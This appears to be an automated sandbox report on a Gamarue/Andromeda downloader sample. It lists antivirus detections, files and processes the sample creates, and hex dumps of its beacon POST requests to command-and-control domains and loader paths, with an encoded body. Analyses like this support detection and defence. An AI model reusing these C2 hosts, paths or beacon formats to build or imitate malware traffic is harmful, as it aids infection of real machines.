Analysis Date: 2018-04-19 22:57:59
MD5: fdd2b38a046309996a7cda6c27c3fdb4
SHA1: 437bcf74b894e89cc5b6d675432b7ff04dcf43c4

Static Details:

AV Arcabit (arcavir) — Gen:Variant.Symmi.22996
AV Authentium — W32/A-49bf794c!Eldorado
AV Grisoft (avg) — Error Scanning File
AV Avira (antivir) — TR/Rogue.22761
AV Alwil (avast) — Downloader-TSN [Trj]
AV Ad-Aware — Gen:Variant.Symmi.22996
AV BitDefender — Gen:Variant.Symmi.22996
AV BullGuard — Error Scanning File
AV ClamAV — Win.Trojan.Downloader-61116
AV Dr. Web — BackDoor.Andromeda.178
AV Emsisoft — Gen:Variant.Symmi.22996
AV MicroWorld (escan) — Gen:Variant.Symmi.22996
AV CA (E-Trust Ino) — Error Scanning File
AV Fortinet — W32/Kryptik.BBYD!tr
AV Frisk (f-prot) — W32/A-49bf794c!Eldorado
AV F-Secure — Trojan-Downloader:W32/Wauchos.F
AV Ikarus — Trojan-Downloader.Win32.Andromeda
AV K7 — Trojan ( 0001140e1 )
AV Kaspersky — Error Scanning File
AV MalwareBytes — Error Scanning File
AV Mcafee — W32/Worm-FKU!FDD2B38A0463
AV Microsoft Security Essentials — Worm:Win32/Gamarue.AJ
AV NANO — Trojan.Win32.Andromeda.ccgyxx
AV Eset (nod32) — Win32/Injector.AIOX
AV Padvish — No Virus
AV CAT (quickheal) — Worm.Gamarue.B
AV Rising — Trojan.Win32.Read.a
AV 360 Safe — Worm.Win32.Gamarue.V
AV SUPERAntiSpyware — Trojan.Agent/Gen-Dofoil
AV Symantec — Downloader.Dromedan
AV Trend Micro — WORM_GAMARUE.SMJ
AV Twister — Trojan.D875EDBFBC8E8805
AV VirusBlokAda (vba32) — SScope.Worm.Gamarue.2713
AV Windows Defender — Worm:Win32/Gamarue.AJ
AV Zillya! — Error Scanning File

Runtime Details:

Screenshot

Process
↳ C:\Windows\System32\lsass.exe

Process
↳ C:\Users\Phil\AppData\Local\Temp\437bcf74b894e89cc5b6d675432b7ff04dcf43c4.exe

Process
↳ C:\Users\Phil\AppData\Local\Temp\437bcf74b894e89cc5b6d675432b7ff04dcf43c4.exe

Creates File: C:\Windows\SysWOW64\svchost.exe

Process
↳ C:\Windows\SysWOW64\svchost.exe

Creates Mutex: (unnamed)
Creates Mutex: 3770066751
Creates File: C:\Windows\Globalization\Sorting\sortdefault.nls
Creates File: C:\Users\Phil\AppData\Local\Temp\437bcf74b894e89cc5b6d675432b7ff04dcf43c4.exe
Creates File: C:\ProgramData\Local Settings\Temp\cchyaywf.exe
Creates File: C:\Windows\SysWOW64\svchost.exe
Creates File: C:\ProgramData\Local Settings\Temp\cchyaywf.exe

Network Details:


Raw Pcap

Note: the GET /ncsi.txt requests to www.msftncsi.com (User-Agent "Microsoft NCSI") are the Windows Network Connectivity Status Indicator probe issued by the operating system itself and should not be treated as an indicator of the sample; the sample's own traffic is the series of POST requests carrying an identical 84-byte base64-like body. In the second and third GET captures below, the bytes after the request's terminating CRLFCRLF appear to be residue from a preceding POST dump rather than part of the GET request.
0x00000000 (00000)   47455420 2f6e6373 692e7478 74204854   GET /ncsi.txt HT
0x00000010 (00016)   54502f31 2e310d0a 436f6e6e 65637469   TP/1.1..Connecti
0x00000020 (00032)   6f6e3a20 436c6f73 650d0a55 7365722d   on: Close..User-
0x00000030 (00048)   4167656e 743a204d 6963726f 736f6674   Agent: Microsoft
0x00000040 (00064)   204e4353 490d0a48 6f73743a 20777777    NCSI..Host: www
0x00000050 (00080)   2e6d7366 746e6373 692e636f 6d0d0a0d   .msftncsi.com...
0x00000060 (00096)   0a                                    .

0x00000000 (00000)   504f5354 202f7374 61746963 2e706870   POST /static.php
0x00000010 (00016)   20485454 502f312e 310d0a48 6f73743a    HTTP/1.1..Host:
0x00000020 (00032)   206d6f72 70686564 2e72750d 0a557365    morphed.ru..Use
0x00000030 (00048)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000040 (00064)   2f342e30 0d0a436f 6e74656e 742d5479   /4.0..Content-Ty
0x00000050 (00080)   70653a20 6170706c 69636174 696f6e2f   pe: application/
0x00000060 (00096)   782d7777 772d666f 726d2d75 726c656e   x-www-form-urlen
0x00000070 (00112)   636f6465 640d0a43 6f6e7465 6e742d4c   coded..Content-L
0x00000080 (00128)   656e6774 683a2038 340d0a43 6f6e6e65   ength: 84..Conne
0x00000090 (00144)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x000000a0 (00160)   75707163 68433435 75315446 462b4a6d   upqchC45u1TFF+Jm
0x000000b0 (00176)   6e594b47 4977694c 7258387a 554e3638   nYKGIwiLrX8zUN68
0x000000c0 (00192)   54337971 76685175 32547165 74513738   T3yqvhQu2TqetQ78
0x000000d0 (00208)   726f7937 5136626f 54664455 74594966   roy7Q6boTfDUtYIf
0x000000e0 (00224)   745a3333 4e686b45 4b517367 396d5933   tZ33NhkEKQsg9mY3
0x000000f0 (00240)   71773d3d                              qw==

0x00000000 (00000)   504f5354 202f326c 64722e70 68702048   POST /2ldr.php H
0x00000010 (00016)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x00000020 (00032)   6d6e7372 6569756f 6a792e72 750d0a55   mnsreiuojy.ru..U
0x00000030 (00048)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000040 (00064)   6c612f34 2e300d0a 436f6e74 656e742d   la/4.0..Content-
0x00000050 (00080)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x00000060 (00096)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000070 (00112)   656e636f 6465640d 0a436f6e 74656e74   encoded..Content
0x00000080 (00128)   2d4c656e 6774683a 2038340d 0a436f6e   -Length: 84..Con
0x00000090 (00144)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x000000a0 (00160)   0d0a7570 71636843 34357531 5446462b   ..upqchC45u1TFF+
0x000000b0 (00176)   4a6d6e59 4b474977 694c7258 387a554e   JmnYKGIwiLrX8zUN
0x000000c0 (00192)   36385433 79717668 51753254 71657451   68T3yqvhQu2TqetQ
0x000000d0 (00208)   3738726f 79375136 626f5466 44557459   78roy7Q6boTfDUtY
0x000000e0 (00224)   4966745a 33334e68 6b454b51 7367396d   IftZ33NhkEKQsg9m
0x000000f0 (00240)   59337177 3d3d                         Y3qw==

0x00000000 (00000)   504f5354 202f336c 64722e70 68702048   POST /3ldr.php H
0x00000010 (00016)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x00000020 (00032)   6d6e7372 6569756f 6a792e72 750d0a55   mnsreiuojy.ru..U
0x00000030 (00048)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000040 (00064)   6c612f34 2e300d0a 436f6e74 656e742d   la/4.0..Content-
0x00000050 (00080)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x00000060 (00096)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000070 (00112)   656e636f 6465640d 0a436f6e 74656e74   encoded..Content
0x00000080 (00128)   2d4c656e 6774683a 2038340d 0a436f6e   -Length: 84..Con
0x00000090 (00144)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x000000a0 (00160)   0d0a7570 71636843 34357531 5446462b   ..upqchC45u1TFF+
0x000000b0 (00176)   4a6d6e59 4b474977 694c7258 387a554e   JmnYKGIwiLrX8zUN
0x000000c0 (00192)   36385433 79717668 51753254 71657451   68T3yqvhQu2TqetQ
0x000000d0 (00208)   3738726f 79375136 626f5466 44557459   78roy7Q6boTfDUtY
0x000000e0 (00224)   4966745a 33334e68 6b454b51 7367396d   IftZ33NhkEKQsg9m
0x000000f0 (00240)   59337177 3d3d                         Y3qw==

0x00000000 (00000)   504f5354 202f3431 6c64722e 70687020   POST /41ldr.php 
0x00000010 (00016)   48545450 2f312e31 0d0a486f 73743a20   HTTP/1.1..Host: 
0x00000020 (00032)   616d6e73 72656975 6f6a792e 72750d0a   amnsreiuojy.ru..
0x00000030 (00048)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000040 (00064)   6c6c612f 342e300d 0a436f6e 74656e74   lla/4.0..Content
0x00000050 (00080)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000060 (00096)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000070 (00112)   6c656e63 6f646564 0d0a436f 6e74656e   lencoded..Conten
0x00000080 (00128)   742d4c65 6e677468 3a203834 0d0a436f   t-Length: 84..Co
0x00000090 (00144)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x000000a0 (00160)   0a0d0a75 70716368 43343575 31544646   ...upqchC45u1TFF
0x000000b0 (00176)   2b4a6d6e 594b4749 77694c72 58387a55   +JmnYKGIwiLrX8zU
0x000000c0 (00192)   4e363854 33797176 68517532 54716574   N68T3yqvhQu2Tqet
0x000000d0 (00208)   51373872 6f793751 36626f54 66445574   Q78roy7Q6boTfDUt
0x000000e0 (00224)   59496674 5a33334e 686b454b 51736739   YIftZ33NhkEKQsg9
0x000000f0 (00240)   6d593371 773d3d                       mY3qw==

0x00000000 (00000)   47455420 2f6e6373 692e7478 74204854   GET /ncsi.txt HT
0x00000010 (00016)   54502f31 2e310d0a 436f6e6e 65637469   TP/1.1..Connecti
0x00000020 (00032)   6f6e3a20 436c6f73 650d0a55 7365722d   on: Close..User-
0x00000030 (00048)   4167656e 743a204d 6963726f 736f6674   Agent: Microsoft
0x00000040 (00064)   204e4353 490d0a48 6f73743a 20777777    NCSI..Host: www
0x00000050 (00080)   2e6d7366 746e6373 692e636f 6d0d0a0d   .msftncsi.com...
0x00000060 (00096)   0a6e2f78 2d777777 2d666f72 6d2d7572   .n/x-www-form-ur
0x00000070 (00112)   6c656e63 6f646564 0d0a436f 6e74656e   lencoded..Conten
0x00000080 (00128)   742d4c65 6e677468 3a203834 0d0a436f   t-Length: 84..Co
0x00000090 (00144)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x000000a0 (00160)   0a0d0a75 70716368 43343575 31544646   ...upqchC45u1TFF
0x000000b0 (00176)   2b4a6d6e 594b4749 77694c72 58387a55   +JmnYKGIwiLrX8zU
0x000000c0 (00192)   4e363854 33797176 68517532 54716574   N68T3yqvhQu2Tqet
0x000000d0 (00208)   51373872 6f793751 36626f54 66445574   Q78roy7Q6boTfDUt
0x000000e0 (00224)   59496674 5a33334e 686b454b 51736739   YIftZ33NhkEKQsg9
0x000000f0 (00240)   6d593371 773d3d                       mY3qw==

0x00000000 (00000)   504f5354 202f3531 6c64722e 70687020   POST /51ldr.php 
0x00000010 (00016)   48545450 2f312e31 0d0a486f 73743a20   HTTP/1.1..Host: 
0x00000020 (00032)   616d6e73 72656975 6f6a792e 72750d0a   amnsreiuojy.ru..
0x00000030 (00048)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000040 (00064)   6c6c612f 342e300d 0a436f6e 74656e74   lla/4.0..Content
0x00000050 (00080)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000060 (00096)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000070 (00112)   6c656e63 6f646564 0d0a436f 6e74656e   lencoded..Conten
0x00000080 (00128)   742d4c65 6e677468 3a203834 0d0a436f   t-Length: 84..Co
0x00000090 (00144)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x000000a0 (00160)   0a0d0a75 70716368 43343575 31544646   ...upqchC45u1TFF
0x000000b0 (00176)   2b4a6d6e 594b4749 77694c72 58387a55   +JmnYKGIwiLrX8zU
0x000000c0 (00192)   4e363854 33797176 68517532 54716574   N68T3yqvhQu2Tqet
0x000000d0 (00208)   51373872 6f793751 36626f54 66445574   Q78roy7Q6boTfDUt
0x000000e0 (00224)   59496674 5a33334e 686b454b 51736739   YIftZ33NhkEKQsg9
0x000000f0 (00240)   6d593371 773d3d                       mY3qw==

0x00000000 (00000)   504f5354 202f366c 64722e70 68702048   POST /6ldr.php H
0x00000010 (00016)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x00000020 (00032)   6d6e7372 6569756f 6a792e72 750d0a55   mnsreiuojy.ru..U
0x00000030 (00048)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000040 (00064)   6c612f34 2e300d0a 436f6e74 656e742d   la/4.0..Content-
0x00000050 (00080)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x00000060 (00096)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000070 (00112)   656e636f 6465640d 0a436f6e 74656e74   encoded..Content
0x00000080 (00128)   2d4c656e 6774683a 2038340d 0a436f6e   -Length: 84..Con
0x00000090 (00144)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x000000a0 (00160)   0d0a7570 71636843 34357531 5446462b   ..upqchC45u1TFF+
0x000000b0 (00176)   4a6d6e59 4b474977 694c7258 387a554e   JmnYKGIwiLrX8zUN
0x000000c0 (00192)   36385433 79717668 51753254 71657451   68T3yqvhQu2TqetQ
0x000000d0 (00208)   3738726f 79375136 626f5466 44557459   78roy7Q6boTfDUtY
0x000000e0 (00224)   4966745a 33334e68 6b454b51 7367396d   IftZ33NhkEKQsg9m
0x000000f0 (00240)   59337177 3d3d3d                       Y3qw===

0x00000000 (00000)   47455420 2f6e6373 692e7478 74204854   GET /ncsi.txt HT
0x00000010 (00016)   54502f31 2e310d0a 436f6e6e 65637469   TP/1.1..Connecti
0x00000020 (00032)   6f6e3a20 436c6f73 650d0a55 7365722d   on: Close..User-
0x00000030 (00048)   4167656e 743a204d 6963726f 736f6674   Agent: Microsoft
0x00000040 (00064)   204e4353 490d0a48 6f73743a 20777777    NCSI..Host: www
0x00000050 (00080)   2e6d7366 746e6373 692e636f 6d0d0a0d   .msftncsi.com...
0x00000060 (00096)   0a2f782d 7777772d 666f726d 2d75726c   ./x-www-form-url
0x00000070 (00112)   656e636f 6465640d 0a436f6e 74656e74   encoded..Content
0x00000080 (00128)   2d4c656e 6774683a 2038340d 0a436f6e   -Length: 84..Con
0x00000090 (00144)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x000000a0 (00160)   0d0a7570 71636843 34357531 5446462b   ..upqchC45u1TFF+
0x000000b0 (00176)   4a6d6e59 4b474977 694c7258 387a554e   JmnYKGIwiLrX8zUN
0x000000c0 (00192)   36385433 79717668 51753254 71657451   68T3yqvhQu2TqetQ
0x000000d0 (00208)   3738726f 79375136 626f5466 44557459   78roy7Q6boTfDUtY
0x000000e0 (00224)   4966745a 33334e68 6b454b51 7367396d   IftZ33NhkEKQsg9m
0x000000f0 (00240)   59337177 3d3d3d                       Y3qw===


Strings